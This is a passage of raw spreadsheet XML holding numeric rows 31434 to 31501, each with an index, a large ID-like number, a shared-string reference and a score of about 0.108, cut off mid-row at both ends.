      <c r="D31434" s="2">
        <v>1.0</v>
      </c>
      <c r="E31434" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31434" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31435" ht="15.75" customHeight="1">
      <c r="A31435" s="1">
        <v>14358.0</v>
      </c>
      <c r="B31435" s="2">
        <v>3.8943363E7</v>
      </c>
      <c r="C31435" s="2" t="s">
        <v>30231</v>
      </c>
      <c r="D31435" s="2">
        <v>1.0</v>
      </c>
      <c r="E31435" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31435" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31436" ht="15.75" customHeight="1">
      <c r="A31436" s="1">
        <v>14554.0</v>
      </c>
      <c r="B31436" s="2">
        <v>3.9969049E7</v>
      </c>
      <c r="C31436" s="2" t="s">
        <v>30232</v>
      </c>
      <c r="D31436" s="2">
        <v>1.0</v>
      </c>
      <c r="E31436" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31436" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31437" ht="15.75" customHeight="1">
      <c r="A31437" s="1">
        <v>14669.0</v>
      </c>
      <c r="B31437" s="2">
        <v>4.0453467E7</v>
      </c>
      <c r="C31437" s="2" t="s">
        <v>30233</v>
      </c>
      <c r="D31437" s="2">
        <v>1.0</v>
      </c>
      <c r="E31437" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31437" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31438" ht="15.75" customHeight="1">
      <c r="A31438" s="1">
        <v>14721.0</v>
      </c>
      <c r="B31438" s="2">
        <v>4.0634334E7</v>
      </c>
      <c r="C31438" s="2" t="s">
        <v>30234</v>
      </c>
      <c r="D31438" s="2">
        <v>1.0</v>
      </c>
      <c r="E31438" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31438" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31439" ht="15.75" customHeight="1">
      <c r="A31439" s="1">
        <v>14724.0</v>
      </c>
      <c r="B31439" s="2">
        <v>4.066474E7</v>
      </c>
      <c r="C31439" s="2" t="s">
        <v>30235</v>
      </c>
      <c r="D31439" s="2">
        <v>1.0</v>
      </c>
      <c r="E31439" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31439" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31440" ht="15.75" customHeight="1">
      <c r="A31440" s="1">
        <v>15007.0</v>
      </c>
      <c r="B31440" s="2">
        <v>4.1466355E7</v>
      </c>
      <c r="C31440" s="2" t="s">
        <v>30236</v>
      </c>
      <c r="D31440" s="2">
        <v>1.0</v>
      </c>
      <c r="E31440" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31440" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31441" ht="15.75" customHeight="1">
      <c r="A31441" s="1">
        <v>15009.0</v>
      </c>
      <c r="B31441" s="2">
        <v>4.1466355E7</v>
      </c>
      <c r="C31441" s="2" t="s">
        <v>30237</v>
      </c>
      <c r="D31441" s="2">
        <v>1.0</v>
      </c>
      <c r="E31441" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31441" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31442" ht="15.75" customHeight="1">
      <c r="A31442" s="1">
        <v>15427.0</v>
      </c>
      <c r="B31442" s="2">
        <v>4.2930285E7</v>
      </c>
      <c r="C31442" s="2" t="s">
        <v>30238</v>
      </c>
      <c r="D31442" s="2">
        <v>1.0</v>
      </c>
      <c r="E31442" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31442" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31443" ht="15.75" customHeight="1">
      <c r="A31443" s="1">
        <v>15691.0</v>
      </c>
      <c r="B31443" s="2">
        <v>4.3883697E7</v>
      </c>
      <c r="C31443" s="2" t="s">
        <v>20514</v>
      </c>
      <c r="D31443" s="2">
        <v>1.0</v>
      </c>
      <c r="E31443" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31443" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31444" ht="15.75" customHeight="1">
      <c r="A31444" s="1">
        <v>16128.0</v>
      </c>
      <c r="B31444" s="2">
        <v>4.5507702E7</v>
      </c>
      <c r="C31444" s="2" t="s">
        <v>30239</v>
      </c>
      <c r="D31444" s="2">
        <v>1.0</v>
      </c>
      <c r="E31444" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31444" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31445" ht="15.75" customHeight="1">
      <c r="A31445" s="1">
        <v>16234.0</v>
      </c>
      <c r="B31445" s="2">
        <v>4.5748525E7</v>
      </c>
      <c r="C31445" s="2" t="s">
        <v>30240</v>
      </c>
      <c r="D31445" s="2">
        <v>1.0</v>
      </c>
      <c r="E31445" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31445" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31446" ht="15.75" customHeight="1">
      <c r="A31446" s="1">
        <v>16394.0</v>
      </c>
      <c r="B31446" s="2">
        <v>4.6284595E7</v>
      </c>
      <c r="C31446" s="2" t="s">
        <v>30241</v>
      </c>
      <c r="D31446" s="2">
        <v>1.0</v>
      </c>
      <c r="E31446" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31446" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31447" ht="15.75" customHeight="1">
      <c r="A31447" s="1">
        <v>17309.0</v>
      </c>
      <c r="B31447" s="2">
        <v>4.9314545E7</v>
      </c>
      <c r="C31447" s="2" t="s">
        <v>30242</v>
      </c>
      <c r="D31447" s="2">
        <v>1.0</v>
      </c>
      <c r="E31447" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31447" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31448" ht="15.75" customHeight="1">
      <c r="A31448" s="1">
        <v>17774.0</v>
      </c>
      <c r="B31448" s="2">
        <v>5.0764692E7</v>
      </c>
      <c r="C31448" s="2" t="s">
        <v>30243</v>
      </c>
      <c r="D31448" s="2">
        <v>1.0</v>
      </c>
      <c r="E31448" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31448" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31449" ht="15.75" customHeight="1">
      <c r="A31449" s="1">
        <v>17815.0</v>
      </c>
      <c r="B31449" s="2">
        <v>5.0901846E7</v>
      </c>
      <c r="C31449" s="2" t="s">
        <v>30244</v>
      </c>
      <c r="D31449" s="2">
        <v>1.0</v>
      </c>
      <c r="E31449" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31449" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31450" ht="15.75" customHeight="1">
      <c r="A31450" s="1">
        <v>17915.0</v>
      </c>
      <c r="B31450" s="2">
        <v>5.1152844E7</v>
      </c>
      <c r="C31450" s="2" t="s">
        <v>30245</v>
      </c>
      <c r="D31450" s="2">
        <v>1.0</v>
      </c>
      <c r="E31450" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31450" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31451" ht="15.75" customHeight="1">
      <c r="A31451" s="1">
        <v>17917.0</v>
      </c>
      <c r="B31451" s="2">
        <v>5.115638E7</v>
      </c>
      <c r="C31451" s="2" t="s">
        <v>30246</v>
      </c>
      <c r="D31451" s="2">
        <v>1.0</v>
      </c>
      <c r="E31451" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31451" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31452" ht="15.75" customHeight="1">
      <c r="A31452" s="1">
        <v>18160.0</v>
      </c>
      <c r="B31452" s="2">
        <v>5.1897119E7</v>
      </c>
      <c r="C31452" s="2" t="s">
        <v>30247</v>
      </c>
      <c r="D31452" s="2">
        <v>1.0</v>
      </c>
      <c r="E31452" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31452" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31453" ht="15.75" customHeight="1">
      <c r="A31453" s="1">
        <v>18768.0</v>
      </c>
      <c r="B31453" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C31453" s="2" t="s">
        <v>30248</v>
      </c>
      <c r="D31453" s="2">
        <v>1.0</v>
      </c>
      <c r="E31453" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31453" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31454" ht="15.75" customHeight="1">
      <c r="A31454" s="1">
        <v>18837.0</v>
      </c>
      <c r="B31454" s="2">
        <v>5.3959977E7</v>
      </c>
      <c r="C31454" s="2" t="s">
        <v>30249</v>
      </c>
      <c r="D31454" s="2">
        <v>1.0</v>
      </c>
      <c r="E31454" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31454" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31455" ht="15.75" customHeight="1">
      <c r="A31455" s="1">
        <v>19380.0</v>
      </c>
      <c r="B31455" s="2">
        <v>5.5499568E7</v>
      </c>
      <c r="C31455" s="2" t="s">
        <v>30250</v>
      </c>
      <c r="D31455" s="2">
        <v>1.0</v>
      </c>
      <c r="E31455" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31455" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31456" ht="15.75" customHeight="1">
      <c r="A31456" s="1">
        <v>19717.0</v>
      </c>
      <c r="B31456" s="2">
        <v>5.6575212E7</v>
      </c>
      <c r="C31456" s="2" t="s">
        <v>30251</v>
      </c>
      <c r="D31456" s="2">
        <v>1.0</v>
      </c>
      <c r="E31456" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31456" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31457" ht="15.75" customHeight="1">
      <c r="A31457" s="1">
        <v>19894.0</v>
      </c>
      <c r="B31457" s="2">
        <v>5.7295918E7</v>
      </c>
      <c r="C31457" s="2" t="s">
        <v>30252</v>
      </c>
      <c r="D31457" s="2">
        <v>1.0</v>
      </c>
      <c r="E31457" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31457" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31458" ht="15.75" customHeight="1">
      <c r="A31458" s="1">
        <v>20289.0</v>
      </c>
      <c r="B31458" s="2">
        <v>1.1206036E7</v>
      </c>
      <c r="C31458" s="2" t="s">
        <v>30253</v>
      </c>
      <c r="D31458" s="2">
        <v>1.0</v>
      </c>
      <c r="E31458" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31458" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31459" ht="15.75" customHeight="1">
      <c r="A31459" s="1">
        <v>20357.0</v>
      </c>
      <c r="B31459" s="2">
        <v>1.1672873E7</v>
      </c>
      <c r="C31459" s="2" t="s">
        <v>30254</v>
      </c>
      <c r="D31459" s="2">
        <v>1.0</v>
      </c>
      <c r="E31459" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31459" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31460" ht="15.75" customHeight="1">
      <c r="A31460" s="1">
        <v>21627.0</v>
      </c>
      <c r="B31460" s="2">
        <v>2.4639452E7</v>
      </c>
      <c r="C31460" s="2" t="s">
        <v>30255</v>
      </c>
      <c r="D31460" s="2">
        <v>1.0</v>
      </c>
      <c r="E31460" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31460" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31461" ht="15.75" customHeight="1">
      <c r="A31461" s="1">
        <v>22593.0</v>
      </c>
      <c r="B31461" s="2">
        <v>3.9310042E7</v>
      </c>
      <c r="C31461" s="2" t="s">
        <v>30256</v>
      </c>
      <c r="D31461" s="2">
        <v>1.0</v>
      </c>
      <c r="E31461" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31461" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31462" ht="15.75" customHeight="1">
      <c r="A31462" s="1">
        <v>23118.0</v>
      </c>
      <c r="B31462" s="2">
        <v>5.1247803E7</v>
      </c>
      <c r="C31462" s="2" t="s">
        <v>30257</v>
      </c>
      <c r="D31462" s="2">
        <v>1.0</v>
      </c>
      <c r="E31462" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31462" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31463" ht="15.75" customHeight="1">
      <c r="A31463" s="1">
        <v>23708.0</v>
      </c>
      <c r="B31463" s="2">
        <v>7164476.0</v>
      </c>
      <c r="C31463" s="2" t="s">
        <v>30258</v>
      </c>
      <c r="D31463" s="2">
        <v>1.0</v>
      </c>
      <c r="E31463" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31463" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31464" ht="15.75" customHeight="1">
      <c r="A31464" s="1">
        <v>24073.0</v>
      </c>
      <c r="B31464" s="2">
        <v>9673373.0</v>
      </c>
      <c r="C31464" s="2" t="s">
        <v>30259</v>
      </c>
      <c r="D31464" s="2">
        <v>1.0</v>
      </c>
      <c r="E31464" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31464" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31465" ht="15.75" customHeight="1">
      <c r="A31465" s="1">
        <v>24736.0</v>
      </c>
      <c r="B31465" s="2">
        <v>1.177941E7</v>
      </c>
      <c r="C31465" s="2" t="s">
        <v>30260</v>
      </c>
      <c r="D31465" s="2">
        <v>1.0</v>
      </c>
      <c r="E31465" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31465" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31466" ht="15.75" customHeight="1">
      <c r="A31466" s="1">
        <v>24802.0</v>
      </c>
      <c r="B31466" s="2">
        <v>1.2012501E7</v>
      </c>
      <c r="C31466" s="2" t="s">
        <v>30261</v>
      </c>
      <c r="D31466" s="2">
        <v>1.0</v>
      </c>
      <c r="E31466" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31466" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31467" ht="15.75" customHeight="1">
      <c r="A31467" s="1">
        <v>25355.0</v>
      </c>
      <c r="B31467" s="2">
        <v>1.355471E7</v>
      </c>
      <c r="C31467" s="2" t="s">
        <v>30262</v>
      </c>
      <c r="D31467" s="2">
        <v>1.0</v>
      </c>
      <c r="E31467" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31467" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31468" ht="15.75" customHeight="1">
      <c r="A31468" s="1">
        <v>25545.0</v>
      </c>
      <c r="B31468" s="2">
        <v>1.4277348E7</v>
      </c>
      <c r="C31468" s="2" t="s">
        <v>30263</v>
      </c>
      <c r="D31468" s="2">
        <v>1.0</v>
      </c>
      <c r="E31468" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31468" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31469" ht="15.75" customHeight="1">
      <c r="A31469" s="1">
        <v>25670.0</v>
      </c>
      <c r="B31469" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C31469" s="2" t="s">
        <v>30264</v>
      </c>
      <c r="D31469" s="2">
        <v>1.0</v>
      </c>
      <c r="E31469" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31469" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31470" ht="15.75" customHeight="1">
      <c r="A31470" s="1">
        <v>25943.0</v>
      </c>
      <c r="B31470" s="2">
        <v>1.5230907E7</v>
      </c>
      <c r="C31470" s="2" t="s">
        <v>30265</v>
      </c>
      <c r="D31470" s="2">
        <v>1.0</v>
      </c>
      <c r="E31470" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31470" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31471" ht="15.75" customHeight="1">
      <c r="A31471" s="1">
        <v>26309.0</v>
      </c>
      <c r="B31471" s="2">
        <v>1.6648597E7</v>
      </c>
      <c r="C31471" s="2" t="s">
        <v>30266</v>
      </c>
      <c r="D31471" s="2">
        <v>1.0</v>
      </c>
      <c r="E31471" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31471" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31472" ht="15.75" customHeight="1">
      <c r="A31472" s="1">
        <v>26570.0</v>
      </c>
      <c r="B31472" s="2">
        <v>1.7856901E7</v>
      </c>
      <c r="C31472" s="2" t="s">
        <v>30267</v>
      </c>
      <c r="D31472" s="2">
        <v>1.0</v>
      </c>
      <c r="E31472" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31472" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31473" ht="15.75" customHeight="1">
      <c r="A31473" s="1">
        <v>26772.0</v>
      </c>
      <c r="B31473" s="2">
        <v>1.8488898E7</v>
      </c>
      <c r="C31473" s="2" t="s">
        <v>30268</v>
      </c>
      <c r="D31473" s="2">
        <v>1.0</v>
      </c>
      <c r="E31473" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31473" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31474" ht="15.75" customHeight="1">
      <c r="A31474" s="1">
        <v>27419.0</v>
      </c>
      <c r="B31474" s="2">
        <v>2.1829057E7</v>
      </c>
      <c r="C31474" s="2" t="s">
        <v>30269</v>
      </c>
      <c r="D31474" s="2">
        <v>1.0</v>
      </c>
      <c r="E31474" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31474" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31475" ht="15.75" customHeight="1">
      <c r="A31475" s="1">
        <v>27426.0</v>
      </c>
      <c r="B31475" s="2">
        <v>2.1901851E7</v>
      </c>
      <c r="C31475" s="2" t="s">
        <v>30270</v>
      </c>
      <c r="D31475" s="2">
        <v>1.0</v>
      </c>
      <c r="E31475" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31475" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31476" ht="15.75" customHeight="1">
      <c r="A31476" s="1">
        <v>27544.0</v>
      </c>
      <c r="B31476" s="2">
        <v>2.232777E7</v>
      </c>
      <c r="C31476" s="2" t="s">
        <v>30271</v>
      </c>
      <c r="D31476" s="2">
        <v>1.0</v>
      </c>
      <c r="E31476" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31476" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31477" ht="15.75" customHeight="1">
      <c r="A31477" s="1">
        <v>27557.0</v>
      </c>
      <c r="B31477" s="2">
        <v>2.2397825E7</v>
      </c>
      <c r="C31477" s="2" t="s">
        <v>30272</v>
      </c>
      <c r="D31477" s="2">
        <v>1.0</v>
      </c>
      <c r="E31477" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31477" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31478" ht="15.75" customHeight="1">
      <c r="A31478" s="1">
        <v>27589.0</v>
      </c>
      <c r="B31478" s="2">
        <v>2.25603E7</v>
      </c>
      <c r="C31478" s="2" t="s">
        <v>30273</v>
      </c>
      <c r="D31478" s="2">
        <v>1.0</v>
      </c>
      <c r="E31478" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31478" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31479" ht="15.75" customHeight="1">
      <c r="A31479" s="1">
        <v>27608.0</v>
      </c>
      <c r="B31479" s="2">
        <v>2.2631531E7</v>
      </c>
      <c r="C31479" s="2" t="s">
        <v>30274</v>
      </c>
      <c r="D31479" s="2">
        <v>1.0</v>
      </c>
      <c r="E31479" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31479" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31480" ht="15.75" customHeight="1">
      <c r="A31480" s="1">
        <v>27678.0</v>
      </c>
      <c r="B31480" s="2">
        <v>2.2966724E7</v>
      </c>
      <c r="C31480" s="2" t="s">
        <v>30275</v>
      </c>
      <c r="D31480" s="2">
        <v>1.0</v>
      </c>
      <c r="E31480" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31480" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31481" ht="15.75" customHeight="1">
      <c r="A31481" s="1">
        <v>28158.0</v>
      </c>
      <c r="B31481" s="2">
        <v>2.4899338E7</v>
      </c>
      <c r="C31481" s="2" t="s">
        <v>30276</v>
      </c>
      <c r="D31481" s="2">
        <v>1.0</v>
      </c>
      <c r="E31481" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31481" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31482" ht="15.75" customHeight="1">
      <c r="A31482" s="1">
        <v>28272.0</v>
      </c>
      <c r="B31482" s="2">
        <v>2.5384295E7</v>
      </c>
      <c r="C31482" s="2" t="s">
        <v>30277</v>
      </c>
      <c r="D31482" s="2">
        <v>1.0</v>
      </c>
      <c r="E31482" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31482" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31483" ht="15.75" customHeight="1">
      <c r="A31483" s="1">
        <v>28650.0</v>
      </c>
      <c r="B31483" s="2">
        <v>2.7336698E7</v>
      </c>
      <c r="C31483" s="2" t="s">
        <v>30278</v>
      </c>
      <c r="D31483" s="2">
        <v>1.0</v>
      </c>
      <c r="E31483" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31483" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31484" ht="15.75" customHeight="1">
      <c r="A31484" s="1">
        <v>29082.0</v>
      </c>
      <c r="B31484" s="2">
        <v>3.0348782E7</v>
      </c>
      <c r="C31484" s="2" t="s">
        <v>30279</v>
      </c>
      <c r="D31484" s="2">
        <v>1.0</v>
      </c>
      <c r="E31484" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31484" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31485" ht="15.75" customHeight="1">
      <c r="A31485" s="1">
        <v>29312.0</v>
      </c>
      <c r="B31485" s="2">
        <v>3.1284603E7</v>
      </c>
      <c r="C31485" s="2" t="s">
        <v>30280</v>
      </c>
      <c r="D31485" s="2">
        <v>1.0</v>
      </c>
      <c r="E31485" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31485" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31486" ht="15.75" customHeight="1">
      <c r="A31486" s="1">
        <v>29567.0</v>
      </c>
      <c r="B31486" s="2">
        <v>3.3232204E7</v>
      </c>
      <c r="C31486" s="2" t="s">
        <v>30281</v>
      </c>
      <c r="D31486" s="2">
        <v>1.0</v>
      </c>
      <c r="E31486" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31486" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31487" ht="15.75" customHeight="1">
      <c r="A31487" s="1">
        <v>29657.0</v>
      </c>
      <c r="B31487" s="2">
        <v>3.387616E7</v>
      </c>
      <c r="C31487" s="2" t="s">
        <v>30282</v>
      </c>
      <c r="D31487" s="2">
        <v>1.0</v>
      </c>
      <c r="E31487" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31487" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31488" ht="15.75" customHeight="1">
      <c r="A31488" s="1">
        <v>30667.0</v>
      </c>
      <c r="B31488" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C31488" s="2" t="s">
        <v>30283</v>
      </c>
      <c r="D31488" s="2">
        <v>1.0</v>
      </c>
      <c r="E31488" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31488" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31489" ht="15.75" customHeight="1">
      <c r="A31489" s="1">
        <v>31100.0</v>
      </c>
      <c r="B31489" s="2">
        <v>4855415.0</v>
      </c>
      <c r="C31489" s="2" t="s">
        <v>30284</v>
      </c>
      <c r="D31489" s="2">
        <v>1.0</v>
      </c>
      <c r="E31489" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31489" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31490" ht="15.75" customHeight="1">
      <c r="A31490" s="1">
        <v>31937.0</v>
      </c>
      <c r="B31490" s="2">
        <v>5307237.0</v>
      </c>
      <c r="C31490" s="2" t="s">
        <v>30285</v>
      </c>
      <c r="D31490" s="2">
        <v>1.0</v>
      </c>
      <c r="E31490" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31490" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31491" ht="15.75" customHeight="1">
      <c r="A31491" s="1">
        <v>32366.0</v>
      </c>
      <c r="B31491" s="2">
        <v>5598449.0</v>
      </c>
      <c r="C31491" s="2" t="s">
        <v>30286</v>
      </c>
      <c r="D31491" s="2">
        <v>1.0</v>
      </c>
      <c r="E31491" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31491" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31492" ht="15.75" customHeight="1">
      <c r="A31492" s="1">
        <v>32668.0</v>
      </c>
      <c r="B31492" s="2">
        <v>5930218.0</v>
      </c>
      <c r="C31492" s="2" t="s">
        <v>30287</v>
      </c>
      <c r="D31492" s="2">
        <v>1.0</v>
      </c>
      <c r="E31492" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31492" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31493" ht="15.75" customHeight="1">
      <c r="A31493" s="1">
        <v>32765.0</v>
      </c>
      <c r="B31493" s="2">
        <v>6075065.0</v>
      </c>
      <c r="C31493" s="2" t="s">
        <v>30288</v>
      </c>
      <c r="D31493" s="2">
        <v>1.0</v>
      </c>
      <c r="E31493" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31493" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31494" ht="15.75" customHeight="1">
      <c r="A31494" s="1">
        <v>32874.0</v>
      </c>
      <c r="B31494" s="2">
        <v>6323414.0</v>
      </c>
      <c r="C31494" s="2" t="s">
        <v>30289</v>
      </c>
      <c r="D31494" s="2">
        <v>1.0</v>
      </c>
      <c r="E31494" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31494" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31495" ht="15.75" customHeight="1">
      <c r="A31495" s="1">
        <v>32948.0</v>
      </c>
      <c r="B31495" s="2">
        <v>6478823.0</v>
      </c>
      <c r="C31495" s="2" t="s">
        <v>30290</v>
      </c>
      <c r="D31495" s="2">
        <v>1.0</v>
      </c>
      <c r="E31495" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31495" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31496" ht="15.75" customHeight="1">
      <c r="A31496" s="1">
        <v>33484.0</v>
      </c>
      <c r="B31496" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C31496" s="2" t="s">
        <v>25387</v>
      </c>
      <c r="D31496" s="2">
        <v>1.0</v>
      </c>
      <c r="E31496" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31496" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31497" ht="15.75" customHeight="1">
      <c r="A31497" s="1">
        <v>33954.0</v>
      </c>
      <c r="B31497" s="2">
        <v>9302107.0</v>
      </c>
      <c r="C31497" s="2" t="s">
        <v>30291</v>
      </c>
      <c r="D31497" s="2">
        <v>1.0</v>
      </c>
      <c r="E31497" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31497" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="31498" ht="15.75" customHeight="1">
      <c r="A31498" s="1">
        <v>827.0</v>
      </c>
      <c r="B31498" s="2">
        <v>2.1538744E7</v>
      </c>
      <c r="C31498" s="2" t="s">
        <v>30292</v>
      </c>
      <c r="D31498" s="2">
        <v>1.0</v>
      </c>
      <c r="E31498" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31498" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31499" ht="15.75" customHeight="1">
      <c r="A31499" s="1">
        <v>1657.0</v>
      </c>
      <c r="B31499" s="2">
        <v>2.8152239E7</v>
      </c>
      <c r="C31499" s="2" t="s">
        <v>30293</v>
      </c>
      <c r="D31499" s="2">
        <v>1.0</v>
      </c>
      <c r="E31499" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31499" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31500" ht="15.75" customHeight="1">
      <c r="A31500" s="1">
        <v>7507.0</v>
      </c>
      <c r="B31500" s="2">
        <v>5.1395233E7</v>
      </c>
      <c r="C31500" s="2" t="s">
        <v>30294</v>
      </c>
      <c r="D31500" s="2">
        <v>1.0</v>
      </c>
      <c r="E31500" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31500" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31501" ht="15.75" customHeight="1">
      <c r="A31501" s="1">
        <v>8984.0</v>
      </c>
      <c r="B31501" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C31501" s="2" t="s">
        <v>30295</v>
      </c>
      <c r="D31501" s="2">
        <v>1.0</v>
      </c>
      <c r="E31501" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31501" s="2">
